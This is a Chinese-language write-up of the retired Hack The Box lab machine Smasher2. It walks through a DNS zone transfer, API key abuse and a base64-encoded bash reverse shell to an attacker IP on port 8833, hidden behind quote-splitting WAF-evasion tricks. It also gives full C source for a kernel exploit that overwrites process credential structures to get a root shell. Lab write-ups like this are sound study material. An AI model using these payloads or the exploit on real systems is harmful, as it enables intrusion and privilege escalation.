HTB-靶机-Smasher2
作者:互联网
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.135
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.135 -o ./Smasher2-autorecon
有dns服务开启,试试区域传送
dig -t axfr smasher2.htb @10.10.10.135
发现好些域名,绑定hosts访问
10.10.10.135 wonderfulsessionmanager.smasher2.htb smasher2.htb root.smasher2.htb
爆破下目录
发现目录backup有敏感文件
先把上面两个文件下载下来放着,访问绑定的hosts域名发现一个登陆窗口
这里卡了很久,本靶机难度还是很高的,后来通过网上的writeup分析上面下载下来的文件,得出如下,具体分析可参考:https://0xdf.gitlab.io/2019/12/14/htb-smasher2.html
得到api接口的请求key值,可以通过此key执行命令,在测试的过程中发现有WAF对常规的命令进行拦截,直接使用绕过WAF的执行命令代码反弹shell
WAF绕过技术
https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0
echo '/bin/bash -i >& /dev/tcp/10.10.14.3/8833 0>&1' | base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg==
原始命令
echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg== | base64 -d | bash
绕过WAF命令
{"schedule":
"ec''ho 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg=='|'b'a''s''e'6'4 -'d'|b'a''s'h"}
为了稳定方便的连接目标靶机,本地生成公钥和私钥,然后通过私钥连接到目标靶机
准备root提权,这里提权需要自己写exploit,具体分析和编写exploit参考:https://0xdf.gitlab.io/2019/12/14/htb-smasher2.html#priv-dzonerzy--root
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>
int main ( int argc, char * const * argv)
{
printf ( "[+] PID: %d\n" , getpid());
int fd = open( "/dev/dhid" , O_RDWR);
if (fd < 0 )
{
printf ( "[-] Open failed!\n" );
return -1 ;
}
printf ( "[+] Open OK fd: %d\n" , fd);
unsigned long size = 0xf0000000 ;
unsigned long mmapStart = 0x42424000 ;
unsigned int * addr = ( unsigned int *)mmap(( void *)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0 );
if (addr == MAP_FAILED)
{
perror( "Failed to mmap: " );
close(fd);
return -1 ;
}
printf ( "[+] mmap OK addr: %lx\n" , addr);
unsigned int uid = getuid();
printf ( "[+] UID: %d\n" , uid);
unsigned int credIt = 0 ;
unsigned int credNum = 0 ;
while ((( unsigned long )addr) < (mmapStart + size - 0x40 ))
{
credIt = 0 ;
if ( addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid )
{
credNum++;
printf ( "[+] Found cred structure! ptr: %p, credNum: %d\n" , addr, credNum);
credIt = 0 ;
addr[credIt++] = 0 ;
addr[credIt++] = 0 ;
addr[credIt++] = 0 ;
addr[credIt++] = 0 ;
addr[credIt++] = 0 ;
addr[credIt++] = 0 ;
addr[credIt++] = 0 ;
addr[credIt++] = 0 ;
if (getuid() == 0 )
{
puts ( "[+] GOT ROOT!" );
credIt += 1 ; //Skip 4 bytes, to get capabilities addr
addr[credIt++] = 0xffffffff ;
addr[credIt++] = 0xffffffff ;
addr[credIt++] = 0xffffffff ;
addr[credIt++ ] = 0xffffffff ;
addr[credIt++] = 0xffffffff ;
addr[credIt++] = 0xffffffff ;
addr[credIt++] = 0xffffffff ;
addr[credIt++] = 0xffffffff ;
addr[credIt++] = 0xffffffff ;
addr[credIt++] = 0xffffffff;
execl( "/bin/sh" , "-" , ( char *) NULL );
puts ( "[-] Execl failed..." );
break ;
}
else
{
credIt = 0 ;
addr[credIt++] = uid;
addr[credIt++] = uid;
addr[credIt++] = uid;
addr[credIt++] = uid;
addr[credIt++] = uid;
addr[credIt++] = uid;
addr[credIt++] = uid;
addr[credIt++] = uid;
}
}
addr++;
}
puts ( "[+] Scanning loop END" );
fflush( stdout );
int stop = getchar();
return 0 ;
}
通过本地kali编译完成之后再使用scp传到目标靶机执行exploit提权
标签:Smasher2,int,HTB,++,credIt,0xffffffff,uid,靶机,addr 来源: https://www.cnblogs.com/autopwn/p/14261304.html